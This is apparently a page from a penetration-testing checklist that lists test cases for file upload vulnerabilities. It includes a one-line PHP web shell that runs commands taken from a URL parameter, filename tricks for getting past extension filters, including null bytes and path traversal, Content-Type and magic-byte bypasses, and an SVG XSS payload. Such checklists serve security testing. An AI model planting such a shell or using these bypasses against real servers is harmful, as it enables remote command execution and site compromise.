search

FIle Upload Vulnerabilities

Test Cases:

  1. Unrestricted file upload

    • Upload PHP shell: <?php system($_GET['cmd']); ?>

    • Upload JSP shell

    • Upload ASP/ASPX shell

  2. Extension bypass

    • Double extension: shell.php.jpg

    • Null byte: shell.php%00.jpg

    • Case manipulation: shell.PhP

    • Add valid extension: shell.jpg.php

  3. Content-Type bypass

    • Change to image/jpeg while uploading PHP

  4. Magic byte bypass

    • Add GIF89a at start of PHP file

  5. Path traversal in filename

    • ../../shell.php

    • ..%2F..%2Fshell.php

  6. Polyglot files

    • GIF with embedded PHP code

  7. XXE via SVG/XML upload

  8. XSS via SVG upload <svg onload=alert(1)>

hashtag
Tools

PreviousInjection vulnerabilitiesNextSecurity Misconfigurations

Last updated